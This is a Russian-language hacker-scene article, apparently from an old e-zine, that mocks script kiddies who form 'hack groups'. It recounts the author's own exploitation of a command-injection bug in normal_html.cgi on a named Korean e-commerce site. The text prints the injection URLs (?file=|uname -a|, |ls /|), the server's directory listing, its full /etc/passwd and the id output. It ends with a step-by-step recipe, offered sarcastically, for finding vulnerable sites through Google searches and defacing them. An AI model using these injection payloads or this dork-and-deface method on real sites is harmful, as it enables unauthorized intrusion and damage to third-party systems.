Ты хочешь стать крутым хакером ? Видишь себя лидером супер-пупер хак-группы, зашибающий огромные бабки? Ты думаешь
это очень сложно ? Упаси боже, сегодня я расскажу тебе о том, как сделать все это очень и очень быстро.
Ну, что же приступим.
По традиции вещи, которые тебе понадобятся:
- Мозг
- Руки
- Компутер
- Знание юниксовских команд, самых базовых.
Ты и вправду считаешь, что огромное количество разнообразных хакгрупп, расплодовшихся на просторах нашей Родины действительно являются супер крутыми хакерами? Ты сильно ошибаешься.
В большинстве своем эти хацкеры такие же как ты, только
немного поумней. Вспомним, кто такой хакер? Хакер - это специалист, компьютерщик, это чувак изучающий ОСи, сервера, скрипты, различные программульки, с целью дальнейшего их взлома и
получения таким образом доступа к
конфиденциальной информации. Вспомни момент из фильма "Хакеры": бар, все сидят за столом, заходит чувак, достает из сумки книги. Вспомнил?
А как происходит теперь? Правильно - скрипт-кидиз
повылазили как грибы после дождя, чуваки
дефейсят сайты благодаря багам в скриптам, который
даже не они нашли.
Я тебе расскажу об одном случае, который произошел совсем недавно, а именно в ночь с 8 мая на 9 мая.
Именно 8 мая сего года bugtraq распространил информацию об ошибке в скрипте
normal_html.cgi, позволяющей выполнять произвольный код.
И так уж получилось, что этот скрипт в основном был на корейских серваках. Кто знает, тот поймет, почему именно на корейских, но не об этом сейчас речь.
Так вот, набрав в google.com запрос /normal_html.cgi - мне выбросилось порядка 210 адресов.
Первым оказался www.chiup.co.kr. Набрав адресок: www.chiup.co.kr/normal_html.cgi?file=|uname -a| - узнаем версию операционной системы. Не долго думая, начал я шарить по диску. Соответственно, запрос
?file=|ls /| - показал мне корневую директорию:
bin boot dev etc home home2 initrd lib lost+found misc mnt opt proc root sbin tmp usr var www
Сорри, что в таком не удобно читаем виде, это в браузере ессесно так выглядит, чтобы ты почувствовал всю атмосферу.
Далее как ты понимаешь, ls /etc/ :
DIR_COLORS Muttrc X11 adjtime aliases aliases.db alternatives anacrontab at.deny auto.master auto.misc bashrc cipe cron.d cron.daily cron.hourly cron.monthly cron.weekly crontab csh.cshrc csh.login default dhcpc dhcpcd dumpdates exports fdprm filesystems fstab fstab.REVOKE gpm-root.conf group group- grub.conf gshadow gshadow- host.conf hosts hosts.allow hosts.deny hotplug identd.conf info-dir init.d initlog.conf inittab inputrc ioctl.save iproute2 issue issue.net krb.conf krb.realms krb5.conf ld.so.cache ld.so.conf ldap.conf libuser.conf lilo.conf locale localtime log.d login.defs logrotate.conf logrotate.d ltrace.conf lynx-site.cfg lynx.cfg mail mail.rc mailcap makedev.d man.config mime.types modules.conf modules.conf~ motd mtab mtools.conf nmh nscd.conf nsswitch.conf openldap opt pam.d pam_smb.conf passwd passwd- pine.conf pine.conf.fixed pinforc ppp printcap profile profile.d proftpd proftpd.conf protocols pwdb.conf radvd.conf rc rc.d rc.local rc.sysinit rc0.d rc1.d rc2.d rc3.d rc4.d rc5.d rc6.d redhat-release resolv.conf rmt rpc rpm samba screenrc securetty security sendmail.cf services sgml shadow shadow- shells skel smrsh snmp snmpd.conf ssh ssh2 sudoers sysconfig sysctl.conf syslog.conf termcap tripwire updatedb.conf updfstab.conf updfstab.conf.default warnquota.conf wgetrc xinetd.conf xinetd.d xml
В passwd паролей не оказалось:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/bin/false mailnull:x:47:47::/var/spool/mqueue:/dev/null rpm:x:37:37::/var/lib/rpm:/bin/bash pcap:x:77:77::/var/arpwatch:/sbin/nologin ident:x:98:98:pident user:/:/sbin/nologin rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin radvd:x:75:75:radvd user:/:/bin/false mysql:x:500:500::/usr/local/mysql:/bin/bash chiup:x:501:501::/home2/chiup:/bin/bash backup:x:502:502::/home2/backup:/bin/bash admin_1:x:503:503::/home2/mail/admin_1:/bin/Popsh sss_1:x:504:504::/home2/mail/sss_1:/bin/Popsh ksnet:x:505:505::/home2/ksnet:/bin/bash null:x:1010:0::/usr/null:/bin/bash admin:x:1011:10::/etc/.admin:/bin/bash
Ну и ладно, подумал я. Проверил свои права на системе: id :
uid=99(nobody) gid=99(nobody) groups=99(nobody)
С такими правами shadow мне естественно не показали.
Далее необходимо сказать, что глючный скрипт - это скрипт e-commerce, короче электронного магазина, а естественно там может быть что? Думаю, ты правильно понял меня.
Пока я изучал диск, тут откуда не возьмись появились крутые хацкеры с монтировками и хоплялулэй
- задефейсили сайт. Отметилась www.zudteam.org. Ну, думаю, виртуальные орлы. Зайду к ним на сайтик. Хердыксь первая страница, и несколько корейских сайтов. Наша команда взломала сайт: первые несколько штук все
корейские с подобным глючным скриптом.
А теперь о том, о чем я обещал тебе рассказать, а именно о создании своей хакгруппы.
Что нам нужно:
- грамотный дизайнер, который состряпает красивый сайт;
- знание базовых юниксовых команд;
- подписка на bugtraq: security.nnov.ru и securitylab.ru - этого вполне будет достаточно;
- несколько статей на тему взлома с использованием дырявого скрипта;
Все, ты крутой хацкер с крутой хацкерской группой.
Как действовать: ждешь, когда тебе на мыло
придут новые уязвимости в скриптах. Заходишь на google.com, пишешь запрос типа /_дырявый_скрипт - и проверяешь каждый сайт, дефейсишь, выкладываешь зеркало на свой сайт.
Трудная работа, а гонору - вагон и маленькая
тележка...
Удачи тебе крутой хацкер.